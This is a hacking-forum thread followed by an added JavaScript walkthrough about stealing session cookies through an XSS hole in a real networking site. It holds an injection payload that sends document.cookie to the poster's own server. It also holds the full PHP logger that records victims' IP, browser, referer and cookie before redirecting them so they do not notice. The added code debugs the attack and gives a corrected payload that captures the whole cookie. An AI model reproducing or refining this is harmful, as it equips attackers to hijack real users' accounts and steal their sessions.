HellBound Hackers | Computer General | Web hacking

One-Click XSS Cookie Logger

Author: Guest (quoted later in the thread as lesserlightsofheaven)
Posted on 13-08-07 23:17
Okay, so.

I've found an XSS vulnerability in a high-profile networking site.
The URL looks something like this:

"http://doesntconcernyou.com/youdontneedtoknow.php?safdasdf=sadfas&blank="

An injection such as the following after the "blank" variable works:
Code
<script>window.location="http://www.goatse.cz";</script>

However, I don't merely want to send people to goatse. I'd like to grab their cookies. So when I attempt to craft a URL to send them to my logging hub, like so:

Code
<script>window.location="http://mysite.com/victimsite/oneclick/index.php?c00kie="+document.cookie;</script>

the injection does not work. Any idea as to what I could be doing wrong? Here's the source to the logger:

Code
<?php
// Logger the injected script redirects victims to. The cookie arrives in the
// query string as c00kie=...; the rest is read from the request itself.
$ip         = $_SERVER['REMOTE_ADDR'];
// isset() guards: User-Agent and Referer are not always sent, and c00kie is
// missing if someone hits the logger directly; without the guards PHP emits notices.
$user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$referer    = isset($_SERVER['HTTP_REFERER'])    ? $_SERVER['HTTP_REFERER']    : '';
// stripslashes() undoes magic_quotes_gpc, which would otherwise backslash-escape
// quotes inside the cookie value.
$cookie     = isset($_GET['c00kie']) ? stripslashes($_GET['c00kie']) : '';

$string = $ip . "\n" . $user_agent . "\n" . $referer . "\n" . $cookie;

// One record per hit, records separated by a blank line.
$fp = fopen('log.txt', 'a');
fwrite($fp, $string . "\n\n");
fclose($fp);

// Bounce the victim on to an innocuous page so the detour is not noticed.
header("Location: http://victimsite.com/nonsuspiciouslookingpage");
?>

RE: One-Click XSS Cookie Logger

Author: spyware (Member; Posts: 4192; Joined: 14.04.07; Rank: God; Warn Level: 90)
Posted on 13-08-07 23:28
Does the "+" get filtered maybe?



"The chowner of property." - Zeph
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
"Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?" - Ebert
RE: One-Click XSS Cookie Logger

Author: Guest (lesserlightsofheaven)
Posted on 13-08-07 23:40
Hm, perhaps. Let me try encoding it.


RE: One-Click XSS Cookie Logger

Author: Guest (lesserlightsofheaven)
Posted on 13-08-07 23:45
Aha! That kinda works. I'm getting part of the cookie.


RE: One-Click XSS Cookie Logger

Author: spyware (Member; Posts: 4192; Joined: 14.04.07; Rank: God; Warn Level: 90)
Posted on 13-08-07 23:46
lesserlightsofheaven wrote:
Aha! That kinda works. I'm getting part of the cookie.


What part are you NOT getting?



RE: One-Click XSS Cookie Logger

Author: Guest (lesserlightsofheaven)
Posted on 13-08-07 23:55
All the juicy bits, sadly =P.

One part of the cookie contains the IP, another the location, and the next two are long hashed values.

All I get is the IP.
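The two failure modes discussed in this thread (the "+" that spyware suspected was being filtered, and the cookie arriving truncated) reproduced as an added example; this is not code from the original thread. The logger URL and the query parameter names are taken from the first post. The cookie value, and the "&" and "#" placed inside its location field, are constructed for the example: the thread does not say which character was actually responsible for the truncation, so the example shows the two URL metacharacters that cut a query value short in exactly the way described.

```javascript
// Added example, not code from the thread. Node.js 18+ (built-ins only).
// It reproduces the two failures discussed above:
//   1. a literal "+" in a query string is decoded as a space by the server
//      (PHP's $_GET and WHATWG URLSearchParams agree on this), so the
//      injected script no longer parses;
//   2. document.cookie is appended to the exfil URL without encoding, so a
//      URL metacharacter inside a cookie value (& or # here) cuts it short.
// LOGGER and VULN_QUERY come from the first post; SAMPLE_COOKIE is constructed.

const LOGGER = "http://mysite.com/victimsite/oneclick/index.php?c00kie=";
const VULN_QUERY = "safdasdf=sadfas&blank=";

// What the vulnerable page reflects: the decoded `blank` parameter, which it
// then writes into its HTML unescaped.
function reflectedValue(queryString) {
  return new URLSearchParams(queryString).get("blank");
}

// The payload from the first post, as it would be pasted into the URL.
const RAW_PAYLOAD =
  '<script>window.location="' + LOGGER + '"+document.cookie;</script>';

// Pasted raw, the "+" arrives as a space and `"..." document.cookie;` is a
// JavaScript syntax error, so nothing runs.
function reflectedRawPayload() {
  return reflectedValue(VULN_QUERY + RAW_PAYLOAD);
}

// Percent-encode the payload before putting it in the URL ("+" becomes %2B)
// and it round-trips intact.
function injectionQuery(payload) {
  return VULN_QUERY + encodeURIComponent(payload);
}

function reflectedEncodedPayload() {
  return reflectedValue(injectionQuery(RAW_PAYLOAD));
}

// What the logger's $_GET['c00kie'] holds for a given exfil URL: the URL
// parser drops everything after "#", and "&" starts the next parameter.
function loggedCookie(exfilUrl) {
  return new URL(exfilUrl).searchParams.get("c00kie");
}

// A cookie in the shape described in the last post (IP, location, two hashes).
// The location value deliberately contains "&" and "#".
const SAMPLE_COOKIE =
  "ip=10.0.0.5; loc=lat=52.5&lon=13.4#approx; " +
  "sid=9f86d081884c7d659a2feaa0c55ad015; auth=e3b0c44298fc1c149afbf4c8996fb924";

// Appended unencoded, only the part before the first "&" survives.
function exfilUnencoded(cookie) {
  return loggedCookie(LOGGER + cookie);
}

// Encoded in the browser first, the whole cookie string is logged.
function exfilEncoded(cookie) {
  return loggedCookie(LOGGER + encodeURIComponent(cookie));
}

// The corrected injection: encode the cookie client-side, then encode the
// whole payload for the vulnerable URL.
const FIXED_PAYLOAD =
  '<script>window.location="' + LOGGER +
  '"+encodeURIComponent(document.cookie);</script>';

function fixedInjectionQuery() {
  return injectionQuery(FIXED_PAYLOAD);
}

console.log("raw payload as reflected:    ", reflectedRawPayload());
console.log("encoded payload as reflected:", reflectedEncodedPayload());
console.log("cookie logged, unencoded:    ", exfilUnencoded(SAMPLE_COOKIE));
console.log("cookie logged, encoded:      ", exfilEncoded(SAMPLE_COOKIE));
console.log("fixed injection query:       ", fixedInjectionQuery());
```

Run it with `node` and the five printed lines show each case. `reflectedValue` mirrors PHP's `$_GET` decoding closely enough for this purpose: both turn a bare "+" into a space, which is why sending %2B (or percent-encoding the whole payload) fixed the first problem. The second half shows why `document.cookie` should be wrapped in `encodeURIComponent()` on the victim's side before it is put in the URL: anything after "#" never leaves the browser, and "&" starts a new query parameter on the logger, so a cookie containing either reaches `log.txt` cut off at that character.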